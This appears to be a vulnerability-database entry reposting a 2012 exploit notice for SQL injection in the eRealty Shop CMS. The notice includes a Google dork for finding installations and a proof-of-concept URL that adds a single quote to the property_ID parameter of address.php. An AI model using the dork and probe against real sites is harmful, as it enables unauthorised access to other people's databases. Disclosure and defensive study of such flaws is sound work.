eRealty Shop SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047556 漏洞类型
发布时间 2012-04-28 更新时间 2012-04-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040235
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
####################################################################
# Exploit Title: eRealty SHop SQL Injection
# Google Dork: "The eRealty Shop, Inc. All rights reserved."
# Date: 27/04/2012
# Author: #BHG Security Center
# H0me : www.black-hg.org <http://www.secure-land.net/>
# Software Link: www.theerealtyshop.com
# Version: last version
# Tested on: Linux/Ubuntu - Windows7
# CVE : none
####################################################################
# p0c :
#
# address.php?property_ID=234'
# The CMS Have SQL Injection in address.php ;)
####################################################################
# exmample :
# http://www.theerealtyshop.com/address.php?property_ID=234'
####################################################################
# Special Thanks To : Net.Edit0r - A.Cr0x - 3H34N & ....
####################################################################
# GreetZ : Mikili - 2MzRp - 0x0ptim0us and all of SecureLand Members.